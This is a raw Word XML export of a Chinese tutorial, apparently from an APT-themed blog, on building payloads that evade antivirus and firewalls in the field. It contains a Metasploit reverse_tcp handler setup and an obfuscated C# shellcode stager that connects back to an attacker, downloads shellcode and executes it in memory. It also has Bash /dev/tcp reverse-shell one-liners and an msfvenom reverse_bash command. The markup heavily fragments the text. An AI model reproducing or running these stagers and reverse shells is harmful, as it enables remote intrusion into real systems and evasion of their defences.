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383838"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>注APT攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micropo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>or.blogspot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="34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1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在实战中可能会遇到各种诉求payload，并且可能遇到各种实际问题，如杀毒软件，防火墙拦截，特定端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>口通道，隧道等问题。这里我们根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1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>据第十</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>课补充其中部分，其他内容后续补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="67" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1402" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这次主要补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>充了C#，Bash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7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ps:在线代码高亮：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>tool.oschina.net/highlight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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pacing w:val="10"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1.C#-payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>oad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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6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6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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="-17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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="67" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="5521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exploit(handler)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1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set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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="-11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windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="7161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exploit(handler)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9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set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LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="-19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192.168.1.107</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="28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1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>混淆：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using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System;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using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System.Net;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using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System.Net.Sockets;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using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System.Runtime.InteropServices;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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="6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System.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namespace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RkfCHtll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class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LiNGeDokqnEH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idCWVw(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string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VVUUJUQytjlL,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eMcukOUqFuHbUv)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="381" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="2011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IPEndPoint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nlttgWAMdEQgAo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IPEndPoint(IPAddress.Parse(VVUUJUQytjlL),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="8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eMcukOUqFuHbUv);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fzTiwdk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Socket(AddressFamily.InterNetwork,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SocketType.Stream,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="-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ProtocolType.Tcp);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try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fzTiwdk.Connect(nlttgWAMdEQgAo);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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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catch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return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null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;}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gJVVagJmu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[4];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fzTiwdk.Receive(gJVVagJmu,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4,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0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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GFxHorfhzft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BitConverter.ToInt32(gJVVagJmu,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="1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0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="381" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="6335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mwxyRsYNn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[GFxHorfhzft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+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="-8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5];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yVcZAEmXaMszAc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0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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while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(yVcZAEmXaMszAc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&lt;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GFxHorfhzft)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="367" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="102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yVcZAEmXaMszAc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+=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fzTiwdk.Receive(mwxyRsYNn,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yVcZAEmXaMszAc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+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5,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(GFxHorfhzft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-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yVcZAEmXaMszAc)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&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="-4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4096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XEvFDc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BitConverter.GetBytes((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int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)fzTiwdk.Handle);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10" w:after="0" w:line="367" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="4984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Array.Copy(XEvFDc,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mwxyRsYNn,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1,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4);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mwxyRsYNn[0]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7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0xBF;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return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mwxyRsYNn;}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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void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hcvPkmyIZ(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fPnfqu)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if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(fPnfqu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!=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null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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="367" w:lineRule="auto"/>
        <w:ind w:left="1800" w:right="3272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hcoGPUltNcjK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VirtualAlloc(0,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(UInt32)fPnfqu.Length,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0x1000,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="-6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0x40);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Marshal.Copy(fPnfqu,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(IntPtr)(hcoGPUltNcjK),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="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fPnfqu.Length);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="367" w:lineRule="auto"/>
        <w:ind w:left="1800" w:right="7326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IntPtr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xOxEPnqW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10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IntPtr.Zero;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ooiiZLMzO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0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180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IntPtr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wxPyud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IntPtr.Zero;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="90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xOxEPnqW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CreateThread(0,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hcoGPUltNcjK,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wxPyud,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ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3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ooiiZLMzO);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WaitForSingleObject(xOxEPnqW,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0xFFFFFFFF);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="1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}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="90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void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Main(){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byte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dCwAid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null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dCwAid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idCWVw(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sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="2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xx);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hcvPkmyIZ(dCwAid);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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="90" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="381" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="930" w:firstLine="72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[DllImport(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"kernel32"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private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extern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VirtualAlloc(UInt32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qWBbOS,UInt32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HoKzSHMU,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="-4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[DllImport(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"kernel32"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)]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private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extern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IntPtr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CreateThread(UInt32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tqUXybrozZ,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FMmVpwin,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  <w:spacing w:val="-3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H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[DllImport(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"kernel32"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private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static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extern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WaitForSingleObject(IntPtr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CApwDwK,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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="6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uzGJUddCYTd);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48.600pt;width:312.0pt;height:177.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:53.400pt;margin-top:293.399pt;width:312.0pt;height:166.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:53.400pt;margin-top:497.400pt;width:312.0pt;height:165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pacing w:val="10"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.Bash-payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="83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i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&gt;&amp;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/dev/tcp/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xx.xx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xx.xx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/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0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&gt;&amp;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3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exec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5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&lt;&gt;/dev/tcp/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xx.xx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xx.xx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/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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="90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cat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&lt;&amp;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5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|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while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read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line;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do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$line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2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&gt;&amp;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5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&gt;&amp;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5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  <w:spacing w:val="1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done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1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>附录：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12"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="-30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>生成bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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pacing w:val="4"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>root@John:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>~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#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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cmd/unix/reverse_bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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LHOST=xx.xx..xx.xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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LPORT=xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>payload.sh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84.200pt;margin-top:263.399pt;width:6.0pt;height:6.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:53.400pt;margin-top:90.599pt;width:312.0pt;height:127.8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1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>数简化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6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>项目地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://githu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>b.com/g0tmi1k/mpc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0039" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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